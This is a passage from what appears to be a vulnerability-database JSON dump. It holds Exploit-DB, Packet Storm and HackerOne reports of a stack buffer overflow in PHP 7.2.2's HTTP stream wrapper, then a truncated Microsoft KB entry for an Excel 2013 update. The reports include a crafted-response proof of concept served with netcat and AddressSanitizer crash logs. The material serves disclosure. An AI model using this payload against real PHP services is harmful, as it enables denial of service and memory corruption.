496) 'http_header'\r\n [544, 576) 'buf'\r\n [608, 736) 'tmp_line'\r\n [768, 1792) 'location'\r\n [1824, 2848) 'new_path'\r\n [2880, 3904) 'loc_path'\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex\r\nShadow bytes around the buggy address:\r\n 0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4\r\n 0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00\r\n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00\r\n 0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2\r\n 0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap righ redzone: fb\r\n Freed Heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==26249== ABORTING\r\nAborted", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44846/"}], "packetstorm": [{"lastseen": "2018-06-07T02:15:45", "bulletinFamily": "exploit", "description": "", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "PACKETSTORM:148068", "href": "https://packetstormsecurity.com/files/148068/PHP-7.22-php_stream_url_wrap_http_ex-Buffer-Overflow.html", "title": "PHP 7.22 php_stream_url_wrap_http_ex Buffer Overflow", "type": "packetstorm", "sourceData": "`Description: \n------------ \nThe latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at: \n \nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 \n \nif (tmp_line[tmp_line_len - 1] == '\\n') { \n--tmp_line_len; \nif (tmp_line[tmp_line_len - 1] == '\\r') { \n--tmp_line_len; \n} \n} \n \nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed. \n \n$ bin/php --version \nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS ) \nCopyright (c) 1997-2018 The PHP Group \nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies \n \n \nTest script: \n--------------- \n$ xxd -g 1 poc \n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100.. \n \n$ nc -vvlp 8080 < poc \nListening on [0.0.0.0] (family 0, port 8080) \nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083) \nGET / HTTP/1.0 \nHost: localhost:8080 \nConnection: close \n \n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");' \n \nExpected result: \n---------------- \nNO CRASH \n \nActual result: \n-------------- \n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");' \n================================================================= \n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac \nREAD of size 1 at 0xbfc038ef thread T0 \n#0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 \n#1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979 \n#2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027 \n#3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550 \n#4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224 \n#5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573 \n#6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731 \n#7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760 \n#8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082 \n#9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123 \n#10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134 \n#11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042 \n#12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404 \n#13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82) \n#14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0) \nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack: \nThis frame has 13 object(s): \n[32, 36) 'transport_string' \n[96, 100) 'errstr' \n[160, 164) 'http_header_line_length' \n[224, 232) 'timeout' \n[288, 296) 'req_buf' \n[352, 360) 'tmpstr' \n[416, 432) 'ssl_proxy_peer_name' \n[480, 496) 'http_header' \n[544, 576) 'buf' \n[608, 736) 'tmp_line' \n[768, 1792) 'location' \n[1824, 2848) 'new_path' \n[2880, 3904) 'loc_path' \nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext \n(longjmp and C++ exceptions *are* supported) \nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex \nShadow bytes around the buggy address: \n0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4 \n0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4 \n0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4 \n0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00 \n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00 \n0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 \n0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \nShadow byte legend (one shadow byte represents 8 application bytes): \nAddressable: 00 \nPartially addressable: 01 02 03 04 05 06 07 \nHeap left redzone: fa \nHeap righ redzone: fb \nFreed Heap region: fd \nStack left redzone: f1 \nStack mid redzone: f2 \nStack right redzone: f3 \nStack partial redzone: f4 \nStack after return: f5 \nStack use after scope: f8 \nGlobal redzone: f9 \nGlobal init order: f6 \nPoisoned by user: f7 \nASan internal: fe \n==26249== ABORTING \nAborted \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148068/php722-overflow.txt"}], "hackerone": [{"lastseen": "2019-10-23T18:01:37", "bulletinFamily": "bugbounty", "bounty": 500.0, "description": "In the network interfacing PHP API file_get_contents(), a mechanism is implemented to parse the HTTP/S response from the remote host. A vulnerability is found when the vulnerable PHP build processes certain malformed HTTP/S response packets, resulting an array negative indexing. \n\nVulnerable code at:\n```\nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\n\n\t\t\tif (tmp_line[tmp_line_len - 1] == '\\n') {\n\t\t\t\t--tmp_line_len;\n\t\t\t\tif (tmp_line[tmp_line_len - 1] == '\\r') {\n\t\t\t\t\t--tmp_line_len;\n\t\t\t\t}\n```\n\nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go to -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed.\n```\n$ bin/php --version\nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )\nCopyright (c) 1997-2018 The PHP Group\nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies\n```\n\nTest script:\n```\n---------------\n$ xxd -g 1 poc\n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..\n```\n```\n$ nc -vvlp 8080 < poc\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)\nGET / HTTP/1.0\nHost: localhost:8080\nConnection: close\n\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\n```\nExpected result:\n----------------\nNO CRASH\n\nActual result:\n```\n--------------\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\n=================================================================\n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac\nREAD of size 1 at 0xbfc038ef thread T0\n #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\n #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979\n #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027\n #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550\n #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224\n #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573\n #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731\n #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760\n #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082\n #9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123\n #10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134\n #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042\n #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404\n #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)\n #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)\nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:\n This frame has 13 object(s):\n [32, 36) 'transport_string'\n [96, 100) 'errstr'\n [160, 164) 'http_header_line_length'\n [224, 232) 'timeout'\n [288, 296) 'req_buf'\n [352, 360) 'tmpstr'\n [416, 432) 'ssl_proxy_peer_name'\n [480, 496) 'http_header'\n [544, 576) 'buf'\n [608, 736) 'tmp_line'\n [768, 1792) 'location'\n [1824, 2848) 'new_path'\n [2880, 3904) 'loc_path'\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\n (longjmp and C++ exceptions *are* supported)\nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex\nShadow bytes around the buggy address:\n 0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4\n 0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4\n 0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4\n 0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00\n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00\n 0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2\n 0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Heap righ redzone: fb\n Freed Heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack partial redzone: f4\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n ASan internal: fe\n==26249== ABORTING\nAborted\n```\n\nDetails can be found at https://bugs.php.net/bug.php?id=75981\nThe bug is fixed in the security repo and is pending CVE assignment.\n\n## Impact\n\nA DoS can be triggered when certain conditions are met, or other implications from the subsequent string operations. The affected mechanism is popular as file_get_contents() is a very popular API among PHP based web applications.", "modified": "2019-10-14T04:37:33", "published": "2018-02-27T09:14:23", "id": "H1:320222", "href": "https://hackerone.com/reports/320222", "type": "hackerone", "title": "PHP (IBB): memory corruption while parsing HTTP response", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2019-12-05T10:56:15", "bulletinFamily": "microsoft", "description": "<html><body><p>Describes a security update that fixes vulnerabilities in Microsoft Office. The most severe of these vulnerabilities could allow remote code execution if a user opens a specially crafted Microsoft Office file.</p><h2>Summary</h2><div class=\"kb-summary-section section\"><span></span>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see <a href=\"https://technet.microsoft.com/library/security/ms16-042\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS16-042</a>.<br/><br/><span class=\"text-base\">Note</span> To apply this security update, you must have the release version of <a href=\"https://support.microsoft.com/help/2817430\" id=\"kb-link-3\" target=\"_self\">Service Pack 1 for Microsoft Office 2013</a> installed on the computer.<br/><br/>For a complete list of affected versions of Microsoft Office software, see Microsoft Knowledge Base article <a href=\"https://support.microsoft.com/help/3148775\" id=\"kb-link-4\" target=\"_self\">KB3148775</a>.<br/><br/></div><h2>Improvements and fixes</h2><div class=\"kb-symptoms-section section\">This security update contains improvements and fixes for the following nonsecurity issues:<br/> <ul class=\"sbody-free_list\"><li>Some object model methods take a long time to get cell properties in Excel 2013.<br/></li><li>After you paste a range that contains a data table from one instance of Excel into another, the values from the data table are pasted into the correct destination range, but the data table is also pasted into the original location of the sheet.<br/></li><li>Assume that you change the default view for new sheets in Excel 2013. When you start Excel 2013 again and create a new worksheet on a touch-enabled environment, Excel 2013 may crash.<br/></li></ul></div><h2>How to get and install the update</h2><div class=\"kb-resolution-section section\"><h3 class=\"sbody-h3\">Method 1: Microsoft Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see the \"Turn on automatic updating in Control Panel\" section of <a href=\"https://www.microsoft.com/security/pc-security/updates.aspx\" id=\"kb-link-6\" target=\"_self\">this Safety & Security Center article</a>.</div><h3 class=\"sbody-h3\">Method 2: Microsoft Download Center</h3><div class=\"kb-collapsible kb-collapsible-expanded\">You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.<br/> <ul class=\"sbody-free_list\"><li><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/EN-US/Download.gif\" title=\"Download \"/><a href=\"http://www.microsoft.com/downloads/details.aspx?familyid=abb32f04-b127-46e0-b1a1-e051ec23b6df\" id=\"kb-link-7\" target=\"_self\">Download the security update KB3114947 for the 32-bit version of Excel 2013</a></li><li><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/EN-US/Download.gif\" title=\"Download \"/><a href=\"http://www.microsoft.com/downloads/details.aspx?familyid=416ae38e-fdb7-4c78-8488-735054c00add\" id=\"kb-link-8\" target=\"_self\">Download the security update KB3114947 for the 64-bit version of Excel 2013</a></li></ul><br/></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Security update deployment information</h3> For deployment information about this update, see Microsoft Knowledge Base article <a href=\"https://support.microsoft.com/help/3148775\" id=\"kb-link-9\" target=\"_self\">KB3148775</a>.<br/><h3 class=\"sbody-h3\">Security update replacement information</h3> This security update replaces previously released security update <a href=\"https://support.microsoft.com/help/3114734\" id=\"kb-link-10\" target=\"_self\">KB3114734</a>.<br/><h3 class=\"sbody-h3\">File hash information</h3><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Package Name</th><th class=\"sbody-th\">Package Hash SHA 1</th><th class=\"sbody-th\">Package Hash SHA 2</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">excel2013-kb3114947-fullfile-x64-glb.exe</td><td class=\"sbody-td\">5FB705CAD24786D6B5D521EDBB95CDC71E98FBBC</td><td class=\"sbody-td\">BBE8836ED17B6B7D071CAB91ED4CE64E90BB0192F3C06EA46546EDAC9B400D28</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">excel2013-kb3114947-fullfile-x86-glb.exe</td><td class=\"sbody-td\">A0F4B345D20C95388D2953DEDEE253B6D7C9F026</td><td class=\"sbody-td\">72B8C903086F75F5D48B8765C96CA342AC6F07E4B0F8FBA2799659108A0F5C82</td></tr></table></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">File information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"> The English version of this security update has the file attributes (or later file attributes) that are listed in the following table.<br/> <h4 class=\"sbody-h4\">For all supported x86-based versions of Excel 2013</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File identifier</th><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1025</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">13448</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1030</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">14480</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1031</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">15000</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.3082</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">14488</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1036</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">14496</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1037</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">13424</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1081</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">13952</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1057</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4463.1000</td><td class=\"sbody-td\">13920</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:12</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1040</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">14480</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1041</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">12936</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1042</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">12416</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1043</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">14504</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1046</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">14496</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.2070</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">14496</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1049</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">13952</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1060</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">13928</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:12</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1066</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4481.1000</td><td class=\"sbody-td\">14400</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:12</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.2052</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">11912</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exptoows.dll.1028</td><td class=\"sbody-td\">exptoows.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">12416</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xlintl32.dll_1025</td><td class=\"sbody-td\">xlintl32.dll</td><td class=\"sbody-td\">15.0.4709.1000</td><td class=\"sbody-td\">4669600</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xllex.dll_1025</td><td class=\"sbody-td\">xllex.dll</td><td class=\"sbody-td\">15.0.4569.1000</td><td class=\"sbody-td\">38592</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xlintl32.dll_1026</td><td class=\"sbody-td\">xlintl32.dll</td><td class=\"sbody-td\">15.0.4709.1000</td><td class=\"sbody-td\">4890280</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xllex.dll_1026</td><td class=\"sbody-td\">xllex.dll</td><td class=\"sbody-td\">15.0.4569.1000</td><td class=\"sbody-td\">40616</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xlintl32.dll_1029</td><td class=\"sbody-td\">xlintl32.dll</td><td class=\"sbody-td\">15.0.4709.1000</td><td class=\"sbody-td\">4856000</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xllex.dll_1029</td><td class=\"sbody-td\">xllex.dll</td><td class=\"sbody-td\">15.0.4569.1000</td><td class=\"sbody-td\">66240</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xlintl32.dll_1030</td><td class=\"sbody-td\">xlintl32.dll</td><td class=\"sbody-td\">15.0.4709.1000</td><td class=\"sbody-td\">4553400</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xllex.dll_1030</td><td class=\"sbody-td\">xllex.dll</td><td class=\"sbody-td\">15.0.4569.1000</td><td class=\"sbody-td\">41152</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xlintl32.dll_1031</td><td class=\"sbody-td\">xlintl32.dll</td><td class=\"sbody-td\">15.0.4709.1000</td><td class=\"sbody-td\">4713656</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xllex.dll_1031</td><td class=\"sbody-td\">xllex.dll</td><td class=\"sbody-td\">15.0.4569.1000</td><td class=\"sbody-td\">43712</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xlintl32.dll_1032</td><td class=\"sbody-td\">xlintl32.dll</td><td class=\"sbody-td\">15.0.4709.1000</td><td class=\"sbody-td\">5137056</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xllex.dll_1032</td><td class=\"sbody-td\">xllex.dll</td><td class=\"sbody-td\">15.0.4569.1000</td><td class=\"sbody-td\">57512</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xlintl32.dll_3082</td><td class=\"sbody-td\">xlintl32.dll</td><td class=\"sbody-td\">15.0.4709.1000</td><td class=\"sbody-td\">4657352</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xllex.dll_3082</td><td class=\"sbody-td\">xllex.dll</td><td class=\"sbody-td\">15.0.4569.1000</td><td class=\"sbody-td\">43720</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xlintl32.dll_1061</td><td class=\"sbody-td\">xlintl32.dll</td><td class=\"sbody-td\">15.0.4709.1000</td><td 